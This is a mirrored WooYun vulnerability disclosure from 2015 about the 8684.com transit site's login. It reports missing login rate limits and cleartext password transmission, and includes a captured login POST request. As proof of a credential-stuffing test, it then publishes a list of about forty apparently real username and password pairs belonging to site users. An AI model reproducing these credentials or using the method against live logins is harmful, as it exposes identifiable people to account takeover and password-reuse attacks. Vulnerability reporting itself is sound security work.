乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开
8684公交主站登录位置设计缺陷可撞库网站用户
http://www.8684.com主站的登录位置没有登录限制:
抓包用户名密码明文传输的:
POST /8684/ajax.php?cmd=ajlogin HTTP/1.1Host: passport.8684.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://passport.8684.com/8684/login_b_v2.php?ref=http%3A%2F%2Fshenzhen.8684.com%2Fdo%3Fgoback%3Dhttp%253A%252F%252Fwww.8684.com%252F&&f5=0&v=1446356475873Content-Length: 114Cookie: ref=http%3A%2F%2F1212.8684.com%2F; CNZZDATA1253415922=710293042-1446106816-http%253A%252F%252Fpassport.8684.com%252F%7C1446351553; noMoreLoginTips=yes; qu_city=501; Hm_lvt_5995ef2848d06328473f975e9d062263=1446356474; Hm_lpvt_5995ef2848d06328473f975e9d062263=1446356474; shuang11=1Connection: keep-alivePragma: no-cacheCache-Control: no-cachename=aaaaaaaaa&pass=aaaaaaaa&log=1&ref=http%3A%2F%2Fshenzhen.8684.com%2Fdo%3Fgoback%3Dhttp%3A%2F%2Fwww.8684.com%2F
测试撞库网站用户,这里直接贴出来成功帐号证明:
1234 1234 1090wenchuanbo88 wenchuanbo88 1102caokangli 841127 1105kk1431 10160214 1107fhisd 71258691 1110zllajj zllajj 1119tzbr zj19890922 1121mkd888 111111 1123gindal keylink 1123musicmh 511323 1124lyjbenny 7512231 1125hongtaowdf 962464 1127sxj588 6360588 1128lhplee lhp875484 1128snrwcwt yangjun 1129lyf2614 261433289 1129yyytttt yyytttt 1129emoshen zhanqiang 1129softwarely cinderella 1132ruixiang123 123456 1133akenzhou 19851202 1136lylyv 4661879879 1140dsfa 123456 1144lingaoyun lingaoyun 1149bn922 123456 1150andydm 810409 1150ipwisk 73156711 1151lxhuiok lxhuiok 1152jeffow 456123 1152leon_wyh wanyihong 1153vashlang 860421 1153weilai0329 weilai123 1155shuaihong617 137566 1157kimigao 8566665 1168luoxiao94 19861004 1311
加密
危害等级:无影响厂商忽略
忽略时间:2015-11-07 11:10
漏洞Rank:4 (WooYun评价)
暂无